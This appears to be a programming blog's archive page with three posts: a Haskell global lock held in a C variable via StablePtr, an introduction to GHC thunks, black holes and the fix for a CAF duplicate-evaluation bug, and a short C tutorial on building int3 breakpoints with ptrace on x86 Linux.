The Linux kernel is under extreme demands for both performance and flexibility. It's part of every application on a huge number of systems, so any small performance improvement has a large aggregate effect. And those systems are incredibly diverse, making it likely that someone will see a large difference. Finally, kernel development will always involve tricky low-level code as a matter of course. The infrastructure is already there to support it — both software infrastructure and knowledgeable developers.

Friday, November 4, 2011

Global locking through StablePtr

I spoke before of using global locks in Haskell to protect a thread-unsafe C library. And I wrote about a GHC bug which breaks the most straightforward way to get a global lock.

My new solution is to store an MVar lock in a C global variable via StablePtr. I've implemented this, and it seems to work. I'd appreciate if people could bang on this code and report any issues.

You can get the library from Hackage or browse the source, including a test program. You can also use this code as a template for including a similar lock in your own Haskell project.

The C code

On the C side, we declare a global variable and a function to read that variable.

static void* global = 0;

void* hs_globalzmlock_get_global(void) {
    return global;
}

To avoid name clashes, I gave this function a long name based on the z-encoding of my package's name. The variable named global will not conflict with another compilation unit, because it's declared static.

Another C function will set this variable, if it was previously 0. Two threads might execute this code concurrently, so we use a GCC built-in for atomic memory access.

int hs_globalzmlock_set_global(void* new_global) {
    void* old = __sync_val_compare_and_swap(&global, 0, new_global);
    return (old == 0);
}

If old is not 0, then someone has already set global, and our assignment was dropped. We report this condition to the caller.

Foreign imports

On the Haskell side, we import these C functions.

foreign import ccall unsafe "hs_globalzmlock_get_global"
    c_get_global :: IO (Ptr ())

foreign import ccall "hs_globalzmlock_set_global"
    c_set_global :: Ptr () -> IO CInt

The unsafe import of c_get_global demands justification. This wrinkle arises from the fact that GHC runs many Haskell threads on the same OS thread. A long-running foreign call from that OS thread might block unrelated Haskell code. GHC prevents this by moving the foreign call and/or other Haskell threads to a different OS thread. This adds latency to the foreign call — about 100 nanoseconds in my tests.

In most cases a 100 ns overhead is negligible. But it matters for functions which are guaranteed to return in a very short amount of time. And blocking other Haskell threads during such a short call is fine. Marking the import unsafe tells GHC to ignore the blocking concern, and generate a direct C function call.

Our function c_get_global is a good use case for unsafe, because it simply returns a global variable. In my tests, adding unsafe decreased the overall latency of locking by about 50%. We cannot use unsafe with c_set_global because, in the worst case, GCC implements atomic operations with blocking library functions. That's okay because c_set_global will only be called a few times anyway.

The Haskell code

Now we have access to a C global of type void*, and we want to store a Haskell value of type MVar (). The StablePtr module is just what we need. A StablePtr is a reference to some Haskell expression, which can be converted to Ptr (), aka void*. There is no guarantee about this Ptr () value, except that it can be converted back to the original StablePtr.

Here's how we store an MVar:

set :: IO ()
set = do
    mv  <- newMVar ()
    ptr <- newStablePtr mv
    ret <- c_set_global (castStablePtrToPtr ptr)
    when (ret == 0) $
        freeStablePtr ptr

It's fine for two threads to enter set concurrently. In one thread, the assignment will be dropped, and c_set_global will return 0. In that case we free the unused StablePtr, and the MVar will eventually be garbage-collected. StablePtrs must be freed manually, because the GHC garbage collector can't tell if some C code has stashed away the corresponding void*.

Now we can retrieve the MVar, or create it if necessary.

get :: IO (MVar ())
get = do
    p <- c_get_global
    if p == nullPtr
        then set >> get
        else deRefStablePtr (castPtrToStablePtr p)

In the common path, we do an unsynchronized read on the global variable. Only if the variable appears to contain NULL do we allocate an MVar, perform a synchronized compare-and-swap, etc. This keeps overhead low, and makes this library suitable for fine-grained locking.

All that's left is the user-visible locking interface:

lock :: IO a -> IO a
lock act = get >>= flip withMVar (const act)

Inspecting the machine code

Just for fun, let's see how GCC implements __sync_val_compare_and_swap on the AMD64 architecture.

$ objdump -d dist/build/cbits/global.o
...
0000000000000010 <hs_globalzmlock_set_global>:
  10:   31 c0                   xor    %eax,%eax
  12:   f0 48 0f b1 3d 00 00    lock cmpxchg %rdi,0x0(%rip)
  19:   00 00
....

This lock cmpxchg is the same instruction used by the GHC runtime system for its own atomic compare-and-swap. The offset on the operand 0x0(%rip) will be relocated to point at global.

Monday, October 31, 2011

Thunks and lazy blackholes: an introduction to GHC at runtime

This article is about a GHC bug I encountered recently, but it's really an excuse to talk about some GHC internals at an intro level. (In turn, an excuse for me to learn about those internals.)

I'll assume you're familiar with the basics of Haskell and lazy evaluation.

The bug

I spoke before of using global locks in Haskell to protect a thread-unsafe C library. Unfortunately a GHC bug prevents this from working. Using unsafePerformIO at the top level of a file can result in IO that happens more than once.

Here is a simple program which illustrates the problem:

import Control.Concurrent
import Control.Monad
import System.IO.Unsafe

ioThunk :: ()
ioThunk = unsafePerformIO $ do
    me <- myThreadId
    putStrLn ("IO executed by " ++ show me)
{-# NOINLINE ioThunk #-}

main :: IO ()
main = do
    replicateM_ 100 (forkIO (print ioThunk))
    threadDelay 10000 -- wait for other threads

Let's test this, following the compiler flag recommendations for unsafePerformIO.

$ ghc -V
The Glorious Glasgow Haskell Compilation System, version 7.2.1

$ ghc -rtsopts -threaded -fno-cse -fno-full-laziness dupe.hs
[1 of 1] Compiling Main             ( dupe.hs, dupe.o )
Linking dupe ...

$ while true; do ./dupe +RTS -N | head -n 2; echo ----; done

Within a few seconds I see output like this:

----
IO executed by ThreadId 35
()
----
IO executed by ThreadId 78
IO executed by ThreadId 85
----
IO executed by ThreadId 48
()
----

In the middle run, two threads executed the IO action.

This bug was reported two weeks ago and is already fixed in GHC HEAD. I tested with GHC 7.3.20111026, aka g6f5b798, and the problem seemed to go away.

Unfortunately it will be some time before GHC 7.4 is widely deployed, so I'm thinking about workarounds for my original global locking problem. I'll probably store the lock in a C global variable via StablePtr, or failing that, implement all locking in C. But I'd appreciate any other suggestions.

The remainder of this article is an attempt to explain this GHC bug, and the fix committed by Simon Marlow. It's long because

  • I try not to assume you know anything about how GHC works. I don't know very much, myself.

  • There are various digressions.

Objects at runtime

Code produced by GHC can allocate many kinds of objects. Here are just a few:

  • CONSTR objects represent algebraic data constructors and their associated fields. The value (Just 'x') would be represented by a CONSTR object, holding a pointer to another object representing 'x'.

  • FUN objects represent functions, like the value (\x -> x+1).

  • THUNK objects represent computations which have not yet happened. Suppose we write:

    let x = 2 + 2 in f x x

    This code will construct a THUNK object for x and pass it to the code for f. Some time later, f may force evaluation of its argument, and the thunk will, in turn, invoke (+). When the thunk has finished evaluating, it is overwritten with the evaluation result. (Here, this might be an I# CONSTR holding the number 4.) If f then forces its second argument, which is also x, the work done by (+) is not repeated. This is the essence of lazy evaluation.

  • When a thunk is forced, it's first overwritten with a BLACKHOLE object. This BLACKHOLE is eventually replaced with the evaluation result. Therefore a BLACKHOLE represents a thunk which is currently being evaluated.

    Identifying this case helps the garbage collector, and it also gives GHC its seemingly magical ability to detect some infinite loops. Forcing a BLACKHOLE indicates a computation which cannot proceed until the same computation has finished. The GHC runtime will terminate the program with a <<loop>> exception.

  • We can't truly update thunks in place, because the evaluation result might be larger than the space originally allocated for the thunk. So we write an indirection pointing to the evaluation result. These IND objects will later be removed by the garbage collector.

Static objects

Dynamically-allocated objects make sense for values which are created as your program runs. But the top-level declarations in a Haskell module don't need to be dynamically allocated; they already exist when your program starts up. GHC allocates these static objects in your executable's data section, the same place where C global variables live.

Consider this program:

x = Just 'x'

f (Just _) = \y -> y+1

main = print (f x 3)

Ignoring optimizations, GHC will produce code where:

  • x is a CONSTR_STATIC object.

  • f is a FUN_STATIC object. When called, f will return a dynamically-allocated FUN object representing (\y -> y+1).

  • main is a THUNK_STATIC object. It represents the unevaluated expression formed by applying the function print to the argument (f x 3). A static thunk is also known as a constant applicative form, or a CAF for short. Like any other thunk, a CAF may or may not get evaluated. If evaluated, it will be replaced with a black hole and eventually the evaluation result. In this example, main will be evaluated by the runtime system, in deciding what IO to perform.

Black holes and revelations

That's all fine for a single-threaded Haskell runtime, but GHC supports running many Haskell threads across multiple OS threads. This introduces some additional complications. For example, one thread might force a thunk which is currently being evaluated by another thread. The thread will find a BLACKHOLE, but terminating the program would be incorrect. Instead the BLACKHOLE puts the current Haskell thread to sleep, and wakes it up when the evaluation result is ready.

If two threads force the same thunk at the same time, they will both perform the deferred computation. We could avoid this wasted effort by writing and checking for black holes using expensive atomic memory operations. But this is a poor tradeoff; we slow down every evaluation in order to prevent a rare race condition.

As a compiler for a language with pure evaluation, GHC has the luxury of tolerating some duplicated computation. Evaluating an expression twice can't change a program's behavior. And most thunks are cheap to evaluate, hardly worth the effort of avoiding duplication. So GHC follows a "lazy black-holing" strategy.[1][2] Threads write black holes only when they enter the garbage collector. If a thread discovers that one of its thunks has already been claimed, it will abandon the duplicated work-in-progress. This scheme avoids large wasted computations without paying the price on small computations. You can find the gritty details within the function threadPaused, in rts/ThreadPaused.c.

unsafe[Dupable]PerformIO

You may remember that we started, all those many words ago, with a program that uses unsafePerformIO. This breaks the pure-evaluation property of Haskell. Repeated evaluation will affect semantics! Might lazy black-holing be the culprit in the original bug?

Naturally, the GHC developers thought about this case. Here's the implementation of unsafePerformIO:

unsafePerformIO m = unsafeDupablePerformIO (noDuplicate >> m)

noDuplicate = IO $ \s -> case noDuplicate# s of s' -> (# s', () #)

unsafeDupablePerformIO (IO m) = lazy (case m realWorld# of (# _, r #) -> r)

The core behavior is implemented by unsafeDupablePerformIO, using GHC's internal representation of IO actions (which is beyond the scope of this article, to the extent I even have a scope in mind). As the name suggests, unsafeDupablePerformIO provides no guarantee against duplicate execution. The more familiar unsafePerformIO builds this guarantee by first invoking the noDuplicate# primitive operation.

The implementation of noDuplicate#, written in GHC's Cmm intermediate language, handles a few tricky considerations. But it's basically a call to the function threadPaused, which we saw is responsible for lazy black-holing. In other words, thunks built from unsafePerformIO perform eager black-holing.

Since threadPaused has to walk the evaluation stack, unsafeDupablePerformIO might be much faster than unsafePerformIO. In practice, this will matter when performing a great number of very quick IO actions, like peeking a single byte from memory. In this case it is safe to duplicate IO, provided the buffer is unchanging. Let's measure the performance difference.

import GHC.IO
import Foreign hiding (unsafePerformIO)
import System.Random
import Criterion.Main

main = do
    let sz = 1024*1024
    buf <- mallocBytes sz
    let get    i = peekByteOff buf i :: IO Word8
        peek_d i = unsafeDupablePerformIO (get i)
        peek_n i = unsafePerformIO (get i)
        idxes    = take 1024 $ randomRs (0, sz-1) (mkStdGen 49)
    evaluate (sum idxes) -- force idxes ahead of time
    defaultMain
        [ bench "dup"   $ nf (map peek_d) idxes
        , bench "noDup" $ nf (map peek_n) idxes ]

And the results:

$ ghc -rtsopts -threaded -O2 peek.hs && ./peek +RTS -N
...

benchmarking dup
mean: 76.42962 us, lb 75.11134 us, ub 78.18593 us, ci 0.950
std dev: 7.764123 us, lb 6.300310 us, ub 9.790345 us, ci 0.950

benchmarking noDup
mean: 142.1720 us, lb 139.7312 us, ub 145.4300 us, ci 0.950
std dev: 14.43673 us, lb 11.40254 us, ub 17.86663 us, ci 0.950

So performance-critical idempotent actions can benefit from unsafeDupablePerformIO. But most code should use the safer unsafePerformIO, as our bug reproducer does. And the noDuplicate# machinery for unsafePerformIO makes sense, so what's causing our bug?

The bug, finally

After all those details and diversions, let's go back to the fix for GHC bug #5558. The action is mostly in rts/sm/Storage.c. This file is part of GHC's storage manager, which provides services such as garbage collection.

Recall that our problematic code looked like this:

ioThunk :: ()
ioThunk = unsafePerformIO $ do ...

This is an application of the operator ($) to the arguments unsafePerformIO and the do block. So it's a static thunk, a CAF. Here's the old description of how CAF evaluation works, from Storage.c:

The entry code for every CAF does the following:

  • builds a BLACKHOLE in the heap
  • pushes an update frame pointing to the BLACKHOLE
  • calls newCaf, below
  • updates the CAF with a static indirection to the BLACKHOLE

Why do we build a BLACKHOLE in the heap rather than just updating the thunk directly? It's so that we only need one kind of update frame - otherwise we'd need a static version of the update frame too.

So here's the problem. Normal thunks get blackholed in place, and a thread detects duplicated evaluation by noticing that one of its thunks-in-progress became a BLACKHOLE. But static thunks — CAFs — are blackholed by indirection. Two threads might perform the above procedure concurrently, producing two different heap-allocated BLACKHOLEs, and they'd never notice.

As Simon Marlow put it:

Note [atomic CAF entry]

With THREADED_RTS, newCaf() is required to be atomic (see #5558). This is because if two threads happened to enter the same CAF simultaneously, they would create two distinct CAF_BLACKHOLEs, and so the normal threadPaused() machinery for detecting duplicate evaluation will not detect this. Hence in lockCAF() below, we atomically lock the CAF with WHITEHOLE before updating it with IND_STATIC, and return zero if another thread locked the CAF first. In the event that we lost the race, CAF entry code will re-enter the CAF and block on the other thread's CAF_BLACKHOLE.

I can't explain precisely what a WHITEHOLE means, but they're used for spin locks or wait-free synchronization in various places. For example, the MVar primitives are synchronized by the lockClosure spinlock routine, which uses WHITEHOLEs.

The fix

Here's the corrected CAF evaluation procedure:

The entry code for every CAF does the following:

  • builds a CAF_BLACKHOLE in the heap
  • calls newCaf, which atomically updates the CAF with IND_STATIC pointing to the CAF_BLACKHOLE
  • if newCaf returns zero, it re-enters the CAF (see Note [atomic CAF entry])
  • pushes an update frame pointing to the CAF_BLACKHOLE

newCAF is made atomic by introducing a new helper function, lockCAF, which is reproduced here for your viewing pleasure:

STATIC_INLINE StgWord lockCAF (StgClosure *caf, StgClosure *bh)
{
    const StgInfoTable *orig_info;

    orig_info = caf->header.info;

#ifdef THREADED_RTS
    const StgInfoTable *cur_info;

    if (orig_info == &stg_IND_STATIC_info ||
        orig_info == &stg_WHITEHOLE_info) {
        // already claimed by another thread; re-enter the CAF
        return 0;
    }

    cur_info = (const StgInfoTable *)
        cas((StgVolatilePtr)&caf->header.info,
            (StgWord)orig_info,
            (StgWord)&stg_WHITEHOLE_info);

    if (cur_info != orig_info) {
        // already claimed by another thread; re-enter the CAF
        return 0;
    }

    // successfully claimed by us; overwrite with IND_STATIC
#endif

    // For the benefit of revertCAFs(), save the original info pointer
    ((StgIndStatic *)caf)->saved_info = orig_info;

    ((StgIndStatic*)caf)->indirectee = bh;
    write_barrier();
    SET_INFO(caf,&stg_IND_STATIC_info);

    return 1;
}

We grab the CAF's info table pointer, which tells us what kind of object it is. If it's not already claimed by another thread, we write a WHITEHOLE — but only if the CAF hasn't changed in the meantime. This step is an atomic compare-and-swap, implemented by architecture-specific code. The function cas is specified by this pseudocode:

cas(p,o,n) {
    atomically {
        r = *p;
        if (r == o) { *p = n };
        return r;
    }
}

Here's the implementation for x86, using GCC extended inline assembly:

EXTERN_INLINE StgWord
cas(StgVolatilePtr p, StgWord o, StgWord n)
{
    __asm__ __volatile__ (
        "lock\ncmpxchg %3,%1"
        :"=a"(o), "=m" (*(volatile unsigned int *)p)
        :"0" (o), "r" (n));
    return o;
}

There are some interesting variations between architectures. SPARC and x86 use single instructions, while PowerPC and ARMv6 have longer sequences. Old ARM processors require a global spinlock, which sounds painful. Who's running Haskell on ARMv5 chips?

*deep breath*

Thanks for reading / skimming this far! I learned a lot by writing this article, and I hope you enjoyed reading it. I'm sure I said something wrong somewhere, so please do not hesitate to correct me in the comments.


  1. Tim Harris, Simon Marlow, and Simon Peyton Jones. Haskell on a shared-memory multiprocessor. In Haskell '05: Proceedings of the 2005 ACM SIGPLAN workshop on Haskell, pages 49–61.

  2. Simon Marlow, Simon Peyton Jones, and Satnam Singh. Runtime Support for Multicore Haskell. In ICFP'09.

Sunday, January 9, 2011

Implementing breakpoints on x86 Linux

Debugger features such as breakpoints go well beyond the normal ways in which programs interact. How can one process force another process to pause at a particular line of code? We can bet that the debugger is using some special features of the CPU and/or operating system.

As I learned about implementing breakpoints, I was surprised to find that these interfaces, while arcane, are not actually very complex. In this article we'll implement a minimal but working breakpoints library in about 75 lines of C code. All of the code is shown here, and is also available on GitHub.

True, most of us will never write a debugger. But breakpoints are useful in many other tools: profilers, compatibility layers, security scanners, etc. If your program has to interact deeply with another process, without modifying its source code, breakpoints might just do the trick. And I think there's value in knowing what your debugger is really doing.

Our code will compile with gcc and will run on Linux machines with 32- or 64-bit x86 processors. I'll assume you're familiar with the basics of UNIX programming in C. We'll make heavy use of the ptrace system call, which I'll try to explain as we go. If you're looking for other reading about ptrace, I highly recommend this article and of course the manpage.

The API

Our little breakpoint library is named breakfast. Here's breakfast.h:

#ifndef _BREAKFAST_H
#define _BREAKFAST_H

#include <sys/types.h> /* for pid_t */

typedef void *target_addr_t;
struct breakpoint;

void breakfast_attach(pid_t pid);
target_addr_t breakfast_getip(pid_t pid);
struct breakpoint *breakfast_break(pid_t pid, target_addr_t addr);
int breakfast_run(pid_t pid, struct breakpoint *bp);

#endif

Before we dive into the implementation, we'll describe the API our library provides. breakfast is used by one process (the tracing process) to place breakpoints inside the code of another process (the target process). To establish this relationship, the tracing process calls breakfast_attach with the target's process ID. This also suspends execution of the target.

We use breakfast_getip to read the target's instruction pointer, which holds the address of the next instruction it will execute. Note that this is a pointer to machine code within the target's address space. Dereferencing the pointer within our tracing process would make little sense. The type alias target_addr_t reminds us of this fact.

We use breakfast_break to create a breakpoint at a specified address in the target's machine code. This function returns a pointer to a breakpoint structure, which has unspecified contents.

Calling breakfast_run lets the target run until it hits a breakpoint or it exits; breakfast_run returns 1 or 0 respectively. On the first invocation, we'll pass NULL for the argument bp. On subsequent calls, we're resuming from a breakpoint, and we must pass the corresponding breakpoint struct pointer. The breakfast_getip function will tell us the breakpoint's address, but it's our responsibility to map this to the correct breakpoint structure.
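Putting the four functions together, a typical tracing loop looks roughly like this. (This is only a sketch, with pid and addr assumed to be in scope; the complete test program appears below.)

/* Sketch: break every time the target reaches addr. */
breakfast_attach(pid);
struct breakpoint *bp = breakfast_break(pid, addr);
struct breakpoint *last = NULL;
while (breakfast_run(pid, last))
    last = (breakfast_getip(pid) == addr) ? bp : NULL;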

The trap instruction

We will implement a breakpoint by inserting a new CPU instruction into the target's memory at the breakpoint address. This instruction should suspend execution of the target and give control back to the OS.

There are many ways to return control to the OS, but we'd like to minimize disruption to the code we're hot-patching. x86 provides an instruction for exactly this purpose. It's named int3 and is encoded as the single byte 0xCC. When the CPU executes int3, it will stop what it's doing and jump to the interrupt 3 service routine, which is a piece of code chosen by the OS. On Linux, this routine will send the signal SIGTRAP to the current process.

Since we're placing int3 in the target's code, the target will receive a SIGTRAP. Under normal circumstances this would invoke the target's SIGTRAP handler, which usually kills the process. Instead we'd like the tracing process to intercept this signal and interpret it as the target hitting a breakpoint. We'll accomplish this through the magic of ptrace.

Let's start off breakfast.c with some includes:

#include <sys/ptrace.h>
#include <sys/reg.h>
#include <sys/wait.h>
#include <signal.h>   /* for SIGTRAP, used in run() below */
#include <stdlib.h>
#include "breakfast.h"

Then we'll define our trap instruction:

#if defined(__i386)
#define REGISTER_IP EIP
#define TRAP_LEN 1
#define TRAP_INST 0xCC
#define TRAP_MASK 0xFFFFFF00

#elif defined(__x86_64)
#define REGISTER_IP RIP
#define TRAP_LEN 1
#define TRAP_INST 0xCC
#define TRAP_MASK 0xFFFFFFFFFFFFFF00

#else
#error Unsupported architecture
#endif

We use some GCC pre-defined macros to discover the machine architecture, and we define a few constants accordingly. REGISTER_IP expands to a constant from sys/reg.h which identifies the machine register holding the instruction pointer.

The trap instruction is stored as an integer TRAP_INST and its length in bytes is TRAP_LEN. These are the same on 32- and 64-bit x86. The trap instruction is a single byte, but we'll read and write the target's memory in increments of one machine word, meaning 32 or 64 bits. So we'll read 4 or 8 bytes of machine code, clear out the first byte with TRAP_MASK, and substitute 0xCC. Since x86 is a little-endian architecture, the first byte in memory is the least-significant byte of an integer machine word.
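To make that concrete, here's the arithmetic on a sample 64-bit code word. (This is an illustration only, not part of breakfast.c.)

/* Bytes in memory: 55 48 89 e5 b8 ...  (push %rbp; mov %rsp,%rbp; ...) */
long orig    = 0x0000b8e5894855;
long patched = (orig & 0xFFFFFFFFFFFFFF00) | 0xCC;
/* patched == 0x0000b8e58948cc: the low byte, which is the *first*
 * byte in memory on little-endian x86, is now the int3 opcode. */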

Invoking ptrace

All of the various ptrace requests are made through a single system call named ptrace. The first argument specifies the type of request and the meaning of any remaining arguments. The second argument is almost always the process ID of the target.

Before we can mess with the target process, we need to attach to it:

void breakfast_attach(pid_t pid) {
    int status;
    ptrace(PTRACE_ATTACH, pid);
    waitpid(pid, &status, 0);
    ptrace(PTRACE_SETOPTIONS, pid, 0, PTRACE_O_TRACEEXIT);
}

The PTRACE_ATTACH request will stop the target with SIGSTOP. We wait for the target to receive this signal. We also request to receive a notification when the target exits, which I'll explain below.

Note that ptrace and waitpid could fail in various ways. In a real application you'd want to check the return value and/or errno. For brevity I've omitted those checks in this article.

We use another ptrace request to get the value of the target's instruction pointer:

target_addr_t breakfast_getip(pid_t pid) {
    long v = ptrace(PTRACE_PEEKUSER, pid, sizeof(long)*REGISTER_IP);
    return (target_addr_t) (v - TRAP_LEN);
}

Since the target process is suspended, it's not running on any CPU, and its instruction pointer is not stored in a real CPU register. Instead, it's saved to a "user area" in kernel memory. We use the PTRACE_PEEKUSER request to read a machine word from this area at a specified byte offset. The constants in sys/reg.h give the order in which registers appear, so we simply multiply by sizeof(long).

After we hit a breakpoint, the saved IP points to the instruction after the trap instruction. When we resume execution, we'll go back and execute the original instruction that we overwrote with the trap. So we subtract TRAP_LEN to give the true address of the next instruction.
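An aside: PTRACE_GETREGS fetches the entire register set in one call, which can be more convenient than computing byte offsets. Here's a sketch for 64-bit x86; the field names differ on 32-bit, where the instruction pointer is regs.eip.

#include <sys/user.h>  /* struct user_regs_struct */

/* Sketch: same result as breakfast_getip, via PTRACE_GETREGS. */
target_addr_t getip_via_getregs(pid_t pid) {
    struct user_regs_struct regs;
    ptrace(PTRACE_GETREGS, pid, NULL, &regs);
    return (target_addr_t)(regs.rip - TRAP_LEN);
}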

Creating breakpoints

We need to remember two things about a breakpoint: the address of the code we replaced, and the code which originally lived there.

struct breakpoint {
    target_addr_t addr;
    long orig_code;
};

To enable a breakpoint, we save the original code and insert our trap instruction:

static void enable(pid_t pid, struct breakpoint *bp) {
    long orig = ptrace(PTRACE_PEEKTEXT, pid, bp->addr);
    ptrace(PTRACE_POKETEXT, pid, bp->addr, (orig & TRAP_MASK) | TRAP_INST);
    bp->orig_code = orig;
}

The PTRACE_PEEKTEXT request reads a machine word from the target's code address space, which is named "text" for historical reasons. PTRACE_POKETEXT writes to that space. On x86 Linux there's actually no difference between code and data spaces, so PTRACE_PEEKDATA and PTRACE_POKEDATA would work just as well.

Creating a breakpoint is straightforward:

struct breakpoint *breakfast_break(pid_t pid, target_addr_t addr) {
    struct breakpoint *bp = malloc(sizeof(*bp));
    bp->addr = addr;
    enable(pid, bp);
    return bp;
}

To disable a breakpoint we just write back the saved word:

static void disable(pid_t pid, struct breakpoint *bp) {
    ptrace(PTRACE_POKETEXT, pid, bp->addr, bp->orig_code);
}

Running and stepping

Once we attach to the target, its execution stops. Here's how to resume it:

static int run(pid_t pid, int cmd);  /* defined momentarily */

int breakfast_run(pid_t pid, struct breakpoint *bp) {
    if (bp) {
        ptrace(PTRACE_POKEUSER, pid, sizeof(long)*REGISTER_IP, bp->addr);

        disable(pid, bp);
        if (!run(pid, PTRACE_SINGLESTEP))
            return 0;
        enable(pid, bp);
    }
    return run(pid, PTRACE_CONT);
}

We ask ptrace to continue execution — but if we're resuming from a breakpoint, we have to do some cleanup first. We rewind the instruction pointer so that the next instruction to execute is at the breakpoint. Then we disable the breakpoint and make the target execute just one instruction. Once we're past the breakpoint, we can re-enable it for next time. run returns 0 if the target exits, which theoretically could happen during our single-step.

The last piece of the puzzle is run:

static int run(pid_t pid, int cmd) {
    int status, last_sig = 0, event;
    while (1) {
        ptrace(cmd, pid, 0, last_sig);
        waitpid(pid, &status, 0);

        if (WIFEXITED(status))
            return 0;

        if (WIFSTOPPED(status)) {
            last_sig = WSTOPSIG(status);
            if (last_sig == SIGTRAP) {
                event = (status >> 16) & 0xffff;
                return (event == PTRACE_EVENT_EXIT) ? 0 : 1;
            }
        }
    }
}

cmd is either PTRACE_CONT or PTRACE_SINGLESTEP. In the latter case, the OS sets the trap flag (TF) in the target's flags register, making the CPU raise the debug exception (interrupt 1) after one instruction has completed. Linux turns this into a SIGTRAP as well.

ptrace will let the target run until it exits or receives a signal. We use the wait macros to see what happened. If the target exited, we simply return 0. If it received a signal, we check which one. Anything other than SIGTRAP should be delivered through to the target, which we accomplish by passing the signal number to the next ptrace call.

In the case of SIGTRAP, we check bits 16-31 of status for the value PTRACE_EVENT_EXIT, which indicates that the target is about to exit. Recall that we requested this notification by setting the option PTRACE_O_TRACEEXIT. You'd think (at least, I did) that checking WIFEXITED should be enough. But I ran into a problem where delivering a fatal signal to the target would make the tracing process loop forever. I fixed it by adding this extra check. I'm certainly no ptrace expert and I'd be interested to hear more about what's going on here.

Testing it

That's all for breakfast.c! Now let's write a small test.c.

#include <sys/types.h>
#include <signal.h>
#include <unistd.h>
#include <stdio.h>
#include "breakfast.h"

void child();
void parent(pid_t);

int main() {
    pid_t pid;
    if ((pid = fork()) == 0)
        child();
    else
        parent(pid);
    return 0;
}

We fork two separate processes, a parent and a child. The child will do some computation we hope to observe. Let's make it compute the famous factorial function:

int fact(int n) {
    if (n <= 1)
        return 1;
    return n * fact(n-1);
}

void child() {
    kill(getpid(), SIGSTOP);
    printf("fact(5) = %d\n", fact(5));
}

The parent is going to invoke PTRACE_ATTACH and send the child SIGSTOP, but the child might finish executing before the parent gets a chance to call ptrace. So we make the child preemptively stop itself. This isn't a problem when attaching to a long-running process.

Actually, for this fork-and-trace-child pattern, we should be using PTRACE_TRACEME. But we implemented a minimal library, so we work with what we have.
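For reference, here's a sketch of what the child's side would look like under that approach; with PTRACE_TRACEME, the parent wouldn't need PTRACE_ATTACH at all. (This variant isn't part of breakfast, and test.c would need sys/ptrace.h for it.)

/* Sketch: the PTRACE_TRACEME variant of child(). The child volunteers
 * to be traced, then stops itself so the parent can set breakpoints. */
void child() {
    ptrace(PTRACE_TRACEME, 0, NULL, NULL);
    kill(getpid(), SIGSTOP);
    printf("fact(5) = %d\n", fact(5));
}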

The parent uses breakfast to place breakpoints in the child:

void parent(pid_t pid) {
    struct breakpoint *fact_break, *last_break = NULL;
    void *fact_ip = fact, *last_ip;
    breakfast_attach(pid);
    fact_break = breakfast_break(pid, fact_ip);
    while (breakfast_run(pid, last_break)) {
        last_ip = breakfast_getip(pid);
        if (last_ip == fact_ip) {
            printf("Break at fact()\n");
            last_break = fact_break;
        } else {
            printf("Unknown trap at %p\n", last_ip);
            last_break = NULL;
        }
    }
}

In principle we can use breakfast to trace any running process we own, even if we don't have its source code. But we still need a way to find interesting breakpoint addresses. Here it's as easy as we could want: the child forked from our process, so we get the address of its fact function just by taking the address of our fact function.

Let's try it out:

$ gcc -Wall -o test test.c breakfast.c
$ ./test
Break at fact()
Break at fact()
Break at fact()
Break at fact()
Break at fact()
fact(5) = 120

We can see the five calls to fact.

Inspecting the target

The ability to count function calls is already useful for performance profiling. But we'll usually want to get more information out of the stopped target. Let's see if we can read the arguments passed to fact. This part will be specific to 64-bit x86, though the idea generalizes.

Each architecture defines a C calling convention, which specifies how function arguments are passed, often using a combination of registers and stack slots. On 64-bit x86, the first integer argument is passed in the RDI register. You can verify this by running objdump -d test and looking at the disassembled code for fact.

So we'll modify test.c to read this register:

#include <sys/ptrace.h>
#include <sys/reg.h>
...
    if (last_ip == fact_ip) {
        int arg = ptrace(PTRACE_PEEKUSER, pid, sizeof(long)*RDI);
        printf("Break at fact(%d)\n", arg);
    ...

And we get:

$ gcc -Wall -o test test.c breakfast.c
$ ./test
Break at fact(5)
Break at fact(4)
Break at fact(3)
Break at fact(2)
Break at fact(1)
fact(5) = 120

Cool!

Notes

This is my first non-trivial project using ptrace, and it's likely I got some details wrong. Please reply with corrections or advice and I'll update the code if necessary.

This code is available for download at GitHub. It's released under a BSD license, which imposes few restrictions. It's definitely not suitable as-is for production use, but feel free to take the code and build something more with it.

The x86 architecture has dedicated debug registers (DR0 through DR7) for setting breakpoints, subject to various limitations. We ignored this feature in favor of the more flexible software breakpoints. Hardware breakpoints can do some things this technique can't, such as breaking on reads from a particular memory address.
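For the curious, here's a hedged sketch of arming a hardware breakpoint through ptrace. It assumes the x86 Linux layout of struct user, and a real implementation should read-modify-write DR7 rather than clobber it.

#include <stddef.h>    /* offsetof */
#include <sys/user.h>  /* struct user */

/* Sketch: put addr in debug register DR0 and set DR7's L0 bit, enabling
 * an execute breakpoint (type/length bits zero) at that address. */
void hw_break(pid_t pid, target_addr_t addr) {
    ptrace(PTRACE_POKEUSER, pid,
           offsetof(struct user, u_debugreg[0]), addr);
    ptrace(PTRACE_POKEUSER, pid,
           offsetof(struct user, u_debugreg[7]), 1 /* L0 enable */);
}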